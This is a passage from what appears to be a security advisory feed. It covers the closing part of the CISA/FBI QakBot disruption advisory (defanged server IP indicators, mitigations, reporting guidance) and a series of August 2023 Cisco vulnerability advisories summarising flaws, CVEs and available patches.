51.38.62[.]182



December 2021



185.4.67[.]6



April 2022



62.141.42[.]36



April 2022



87.117.247[.]41



May 2022



89.163.212[.]111



May 2022



193.29.187[.]57



May 2022



193.201.9[.]93



June 2022



94.198.50[.]147



August 2022



94.198.50[.]210



August 2022



188.127.243[.]130



September 2022



188.127.243[.]133



September 2022



94.198.51[.]202



October 2022



188.127.242[.]119



November 2022



188.127.242[.]178



November 2022



87.117.247[.]41



December 2022



190.2.143[.]38



December 2022



51.161.202[.]232



January 2023



51.195.49[.]228



January 2023



188.127.243[.]148



January 2023



23.236.181[.]102



Unknown



45.84.224[.]23



Unknown



46.151.30[.]109



Unknown



94.103.85[.]86



Unknown



94.198.53[.]17



Unknown



95.211.95[.]14



Unknown



95.211.172[.]6



Unknown



95.211.172[.]7



Unknown



95.211.172[.]86



Unknown



95.211.172[.]108



Unknown



95.211.172[.]109



Unknown



95.211.198[.]177



Unknown



95.211.250[.]97



Unknown



95.211.250[.]98



Unknown



95.211.250[.]117



Unknown



185.81.114[.]188



Unknown



188.127.243[.]145



Unknown



188.127.243[.]147



Unknown



188.127.243[.]193



Unknown



188.241.58[.]140



Unknown



193.29.187[.]41



Unknown


Organizations are also encouraged to review the Qbot/QakBot Malware presentation from the U.S. Department of Health & Human Services Cybersecurity Program for additional information.


MITRE ATT&CK TECHNIQUES


For detailed associated software descriptions, tactics used, and groups that have been observed using this software, see MITRE ATT&CK's page on QakBot.[9]


MITIGATIONS


Note: For situational awareness, the following SHA-256 hash is associated with FBI's QakBot uninstaller: 7cdee5a583eacf24b1f142413aabb4e556ccf4ef3a4764ad084c1526cc90e117


CISA and FBI recommend network defenders apply the following mitigations to reduce the likelihood of QakBot-related activity and promote identification of QakBot-induced ransomware and malware infections. Disruption of the QakBot botnet does not mitigate other already-installed malware or ransomware on victim computers. Note: These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats and TTPs. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.


Best Practice Mitigation Recommendations


  • Implement a recovery plan to maintain and retain multiple copies of sensitive or proprietary data and servers in a physically separate, segmented, and secure location (i.e., hard drive, storage device, the cloud) [CPG 2.O, 2.R, 5.A].

  • Require all accounts with password logins (e.g., service accounts, admin accounts, and domain admin accounts) to comply with NIST's standards when developing and managing password policies [CPG 2.B]. This includes:
    • Use longer passwords consisting of at least 8 characters and no more than 64 characters in length;

    • Store passwords in hashed format using industry-recognized password managers;

    • Add password user "salts" to shared login credentials;

    • Avoid reusing passwords;

    • Implement multiple failed login attempt account lockouts;

    • Disable password "hints";

    • Refrain from requiring password changes more frequently than once per year.
      Note: NIST guidance suggests favoring longer passwords instead of requiring regular and frequent password resets. Frequent password resets are more likely to result in users developing password "patterns" cyber criminals can easily decipher.

    • Require administrator credentials to install software.


  • Use phishing-resistant multi-factor authentication (MFA) [CPG 2.H] (e.g., security tokens) for remote access and access to any sensitive data repositories. Implement phishing-resistant MFA for as many services as possible—particularly for webmail and VPNs—for accounts that access critical systems and privileged accounts that manage backups. MFA should also be used for remote logins. For additional guidance on secure MFA configurations, visit cisa.gov/MFA and CISA's Implementing Phishing-Resistant MFA Factsheet.

  • Keep all operating systems, software, and firmware up to date. Timely patching is one of the most efficient and cost-effective steps an organization can take to minimize its exposure to cybersecurity threats. Prioritize patching known exploited vulnerabilities of internet-facing systems [CPG 1.E]. CISA offers a range of services at no cost, including scanning and testing to help organizations reduce exposure to threats via mitigating attack vectors. Specifically, Cyber Hygiene services can help provide a second-set of eyes on organizations' internet-accessible assets. Organizations can email vulnerability@cisa.dhs.gov with the subject line, "Requesting Cyber Hygiene Services" to get started.

  • Segment networks to prevent the spread of ransomware. Network segmentation can help prevent the spread of ransomware by controlling traffic flows between—and access to—various subnetworks to restrict adversary lateral movement [CPG 2.F].

  • Identify, detect, and investigate abnormal activity and potential traversal of the indicated malware with a networking monitoring tool. To aid in detecting the malware, implement a tool that logs and reports all network traffic, including lateral movement activity on a network. Endpoint detection and response (EDR) tools are particularly useful for detecting lateral connections as they have insight into common and uncommon network connections for each host [CPG 3.A].

  • Install, regularly update, and enable real time detection for antivirus software on all hosts.

  • Review domain controllers, servers, workstations, and active directories for new and/or unrecognized accounts.

  • Audit user accounts with administrative privileges and configure access controls according to the principle of least privilege [CPG 2.D, 2.E].

  • Disable unused ports [CPG 2.V, 2.W, 2X].

  • Consider adding an email banner to emails received from outside your organization.

  • Disable hyperlinks in received emails.

  • Implement time-based access for accounts set at the admin level and higher. For example, the Just-in-Time access method provisions privileged access when needed and can support enforcement of the principle of least privilege (as well as the Zero Trust model). This is a process where a network-wide policy is set in place to automatically disable admin accounts at the Active Directory level when the account is not in direct need. Individual users may submit their requests through an automated process that grants them access to a specified system for a set timeframe when they need to support the completion of a certain task [CPG 2.E].

  • Disable command-line and scripting activities and permissions. Privilege escalation and lateral movement often depend on software utilities running from the command line. If threat actors are not able to run these tools, they will have difficulty escalating privileges and/or moving laterally.

  • Perform regular secure system backups and create known good copies of all device configurations for repairs and/or restoration. Store copies off-network in physically secure locations and test regularly [CPG 2.R].

  • Ensure all backup data is encrypted, immutable (i.e., cannot be altered or deleted), and covers the entire organization's data infrastructure.

Ransomware Guidance


  • CISA.gov/stopransomware is a whole-of-government resource that serves as one central location for ransomware resources and alerts.

  • CISA, FBI, the National Security Agency (NSA), and Multi-State Information Sharing and Analysis Center (MS-ISAC) published an updated version of the #StopRansomware Guide, as ransomware actors have accelerated their tactics and techniques since its initial release in 2020.

  • CISA has released a new module in its Cyber Security Evaluation Tool (CSET), the Ransomware Readiness Assessment (RRA). CSET is a desktop software tool that guides network defenders through a step-by-step process to evaluate cybersecurity practices on their networks.

VALIDATE SECURITY CONTROLS


In addition to applying mitigations, CISA and FBI recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. CISA and FBI also recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.


To get started:


  1. Select an ATT&CK technique described in this advisory (see MITRE ATT&CK's page on QakBot).[9]

  2. Align your security technologies against the technique.

  3. Test your technologies against the technique.

  4. Analyze your detection and prevention technologies performance.

  5. Repeat the process for all security technologies to obtain a set of comprehensive performance data.

  6. Tune your security program, including people, processes, and technologies, based on the data generated by this process.

CISA and FBI recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques.


REPORTING


FBI is seeking any information that can be shared, to include boundary logs showing communication to and from foreign IP addresses, a sample ransom note, communications with QakBot-affiliated actors, Bitcoin wallet information, decryptor files, and/or a benign sample of an encrypted file. FBI and CISA do not encourage paying ransom, as payment does not guarantee victim files will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities. Regardless of whether you or your organization have decided to pay the ransom, FBI and CISA urge you to promptly report ransomware incidents to a local FBI Field Office or CISA at cisa.gov/report.


RESOURCES


REFERENCES


  1. MITRE: Cobalt Strike

  2. MITRE: Conti

  3. MITRE: ProLock

  4. MITRE: Egregor

  5. MITRE: REvil

  6. MITRE: MegaCortex

  7. MITRE: Black Basta

  8. MITRE: Royal

  9. MITRE: QakBot

DISCLAIMER


The information in this report is being provided "as is" for informational purposes only. CISA and FBI do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favoring by CISA and FBI.


VERSION HISTORY


August 30, 2023: Initial version.


Source: Identification and Disruption of QakBot Infrastructure
#8
Cisco NX-OS Software TACACS+ or RADIUS Remote Authentication Directed Request Denial of Service Vulnerability

A vulnerability in TACACS+ and RADIUS remote authentication for Cisco NX-OS Software could allow an unauthenticated, local attacker to cause an affected device to unexpectedly reload. 


This vulnerability is due to incorrect input validation when processing an authentication attempt if the directed request option is enabled for TACACS+ or RADIUS. An attacker could exploit this vulnerability by entering a crafted string at the login prompt of an affected device. A successful exploit could allow the attacker to cause the affected device to unexpectedly reload, resulting in a denial of service (DoS) condition. 


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-remoteauth-dos-XB6pv74m



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20168
Source: Cisco NX-OS Software TACACS+ or RADIUS Remote Authentication Directed Request Denial of Service Vulnerability
#9
Cisco Nexus 3000 and 9000 Series Switches SFTP Server File Access Vulnerability

A vulnerability in the SFTP server implementation for Cisco Nexus 3000 Series Switches and 9000 Series Switches in standalone NX-OS mode could allow an authenticated, remote attacker to download or overwrite files from the underlying operating system of an affected device. 


This vulnerability is due to a logic error when verifying the user role when an SFTP connection is opened to an affected device. An attacker could exploit this vulnerability by connecting and authenticating via SFTP as a valid, non-administrator user. A successful exploit could allow the attacker to read or overwrite files from the underlying operating system with the privileges of the authenticated user.


Cisco has released software updates that address this vulnerability. There are workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-sftp-xVAp5Hfd



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20115
Source: Cisco Nexus 3000 and 9000 Series Switches SFTP Server File Access Vulnerability
#10
Cisco Application Policy Infrastructure Controller Unauthorized Policy Actions Vulnerability

A vulnerability in the restricted security domain implementation of Cisco Application Policy Infrastructure Controller (APIC) could allow an authenticated, remote attacker to read, modify, or delete non-tenant policies (for example, access policies) created by users associated with a different security domain on an affected system.


This vulnerability is due to improper access control when restricted security domains are used to implement multi-tenancy for policies outside the tenant boundaries. An attacker with a valid user account associated with a restricted security domain could exploit this vulnerability. A successful exploit could allow the attacker to read, modify, or delete policies created by users associated with a different security domain. Exploitation is not possible for policies under tenants that an attacker has no authorization to access.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apic-uapa-F4TAShk



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20230
Source: Cisco Application Policy Infrastructure Controller Unauthorized Policy Actions Vulnerability
#11
Cisco Nexus 3000 and 9000 Series Switches IS-IS Protocol Denial of Service Vulnerability

A vulnerability in the Intermediate System-to-Intermediate System (IS-IS) protocol of Cisco NX-OS Software for the Cisco Nexus 3000 Series Switches and Cisco Nexus 9000 Series Switches in standalone NX-OS mode could allow an unauthenticated, adjacent attacker to cause the IS-IS process to unexpectedly restart, which could cause an affected device to reload.


This vulnerability is due to insufficient input validation when parsing an ingress IS-IS packet. An attacker could exploit this vulnerability by sending a crafted IS-IS packet to an affected device. A successful exploit could allow the attacker to cause a denial of service (DoS) condition due to the unexpected restart of the IS-IS process, which could cause the affected device to reload.


Note: The IS-IS protocol is a routing protocol. To exploit this vulnerability, an attacker must be Layer 2 adjacent to the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-nxos-n3_9k-isis-dos-FTCXB4Vb



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20169
Source: Cisco Nexus 3000 and 9000 Series Switches IS-IS Protocol Denial of Service Vulnerability
#12
Cisco FXOS  Software Arbitrary File Write Vulnerability

A vulnerability in the CLI of Cisco FXOS Software could allow an authenticated, local attacker to create a file or overwrite any file on the filesystem of an affected device, including system files.


The vulnerability occurs because there is no validation of parameters when a specific CLI command is used. An attacker could exploit this vulnerability by authenticating to an affected device and using the command at the CLI. A successful exploit could allow the attacker to overwrite any file on the disk of the affected device, including system files. The attacker must have valid administrative credentials on the affected device to exploit this vulnerability.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fxos-arbitrary-file-BLk6YupL



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20234
Source: Cisco FXOS  Software Arbitrary File Write Vulnerability
#13
Cisco Firepower 4100 Series, Firepower 9300 Security Appliances, and UCS 6300 Series Fabric Interconnects SNMP Denial of Service Vulnerability

A vulnerability in the Simple Network Management Protocol (SNMP) service of Cisco FXOS Software for Firepower 4100 Series and Firepower 9300 Security Appliances and of Cisco UCS 6300 Series Fabric Interconnects could allow an authenticated, remote attacker to cause a denial of service (DoS) condition on an affected device.


This vulnerability is due to the improper handling of specific SNMP requests. An attacker could exploit this vulnerability by sending a crafted SNMP request to an affected device. A successful exploit could allow the attacker to cause the affected device to reload, resulting in a DoS condition.


Note: This vulnerability affects all supported SNMP versions. To exploit this vulnerability through SNMPv2c or earlier, an attacker must know the SNMP community string that is configured on an affected device. To exploit this vulnerability through SNMPv3, the attacker must have valid credentials for an SNMP user who is configured on the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-fp-ucsfi-snmp-dos-qtv69NAO



This advisory is part of the August 2023 Cisco FXOS and NX-OS Software Security Advisory Bundled Publication. For a complete list of the advisories and links to them, see Cisco Event Response: August 2023 Semiannual Cisco FXOS and NX-OS Software Security Advisory Bundled Publication.




     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20200
Source: Cisco Firepower 4100 Series, Firepower 9300 Security Appliances, and UCS 6300 Series Fabric Interconnects SNMP Denial of Service Vulnerability
#14
Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability

A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, local attacker to elevate privileges on an affected device.


This vulnerability is due to insufficient input validation by the operating system CLI. An attacker could exploit this vulnerability by issuing certain commands using sudo. A successful exploit could allow the attacker to view arbitrary files as root on the underlying operating system. The attacker must have valid credentials on the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-te-va-priv-esc-PUdgrx8E



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20217
Source: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability
#15
Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability

A vulnerability in the CLI of Cisco ThousandEyes Enterprise Agent, Virtual Appliance installation type, could allow an authenticated, local attacker to elevate privileges to root on an affected device.


This vulnerability is due to insufficient input validation of user-supplied CLI arguments. An attacker could exploit this vulnerability by authenticating to an affected device and using crafted commands at the prompt. A successful exploit could allow the attacker to execute arbitrary commands as root. The attacker must have valid credentials on the affected device.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-thoueye-privesc-NVhHGwb3



     
         
Security Impact Rating:  High
   
   
       
CVE: CVE-2023-20224
Source: Cisco ThousandEyes Enterprise Agent Virtual Appliance Privilege Escalation Vulnerability
#16
Cisco Integrated Management Controller Cross-Site Scripting Vulnerability

A vulnerability in the web-based management interface of Cisco Integrated Management Controller (IMC) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface.


This vulnerability is due to insufficient validation of user input. An attacker could exploit this vulnerability by persuading a user of an affected interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the browser of the targeted user or access sensitive, browser-based information.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-cimc-xss-UMYtYEtr



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20228
Source: Cisco Integrated Management Controller Cross-Site Scripting Vulnerability
#17
Cisco Unified Contact Center Express Finesse Portal Web Cache Poisoning Vulnerability

A vulnerability in the Tomcat implementation for Cisco Unified Contact Center Express (Unified CCX) could allow an unauthenticated, remote attacker to cause a web cache poisoning attack on an affected device. 


This vulnerability is due to improper input validation of HTTP requests. An attacker could exploit this vulnerability by sending crafted HTTP requests to a specific API endpoint on the Unified CCX Finesse Portal. A successful exploit could allow the attacker to cause the internal WebProxy to redirect users to an attacker-controlled host.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-uccx-wcp-JJeqDT3S



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20232
Source: Cisco Unified Contact Center Express Finesse Portal Web Cache Poisoning Vulnerability
#18
Cisco Prime Infrastructure and Evolved Programmable Network Manager Stored Cross-Site Scripting Vulnerability

A vulnerability in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface on an affected device.


The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected system. An attacker could exploit this vulnerability by injecting malicious code into specific pages of the interface. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pi-epnm-storedxss-tTjO62r



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20222
Source: Cisco Prime Infrastructure and Evolved Programmable Network Manager Stored Cross-Site Scripting Vulnerability
#19
Cisco Prime Infrastructure and Evolved Programmable Network Manager Cross-Site Scripting Vulnerabilities

Multiple vulnerabilities in the web-based management interface of Cisco Prime Infrastructure and Cisco Evolved Programmable Network Manager (EPNM) could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the interface on an affected device.


These vulnerabilities are due to insufficient validation of user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of an affected interface to view a page containing malicious HTML or script content. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit these vulnerabilities, the attacker must have valid credentials to access the web-based management interface of the affected device.


Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-pi-epnm-BFjSRJP5



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20201,CVE-2023-20203,CVE-2023-20205
Source: Cisco Prime Infrastructure and Evolved Programmable Network Manager Cross-Site Scripting Vulnerabilities
#20
Cisco Identity Services Engine Device Credential Information Disclosure Vulnerability

A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to access sensitive information.


This vulnerability is due to the improper storage of sensitive information within the web-based management interface. An attacker could exploit this vulnerability by logging in to the web-based management interface and viewing hidden fields within the application. A successful exploit could allow the attacker to access sensitive information, including device entry credentials, that could aid the attacker in further attacks.


Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.


This advisory is available at the following link:
https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-credentials-tkTO3h3



     
         
Security Impact Rating:  Medium
   
   
       
CVE: CVE-2023-20111
Source: Cisco Identity Services Engine Device Credential Information Disclosure Vulnerability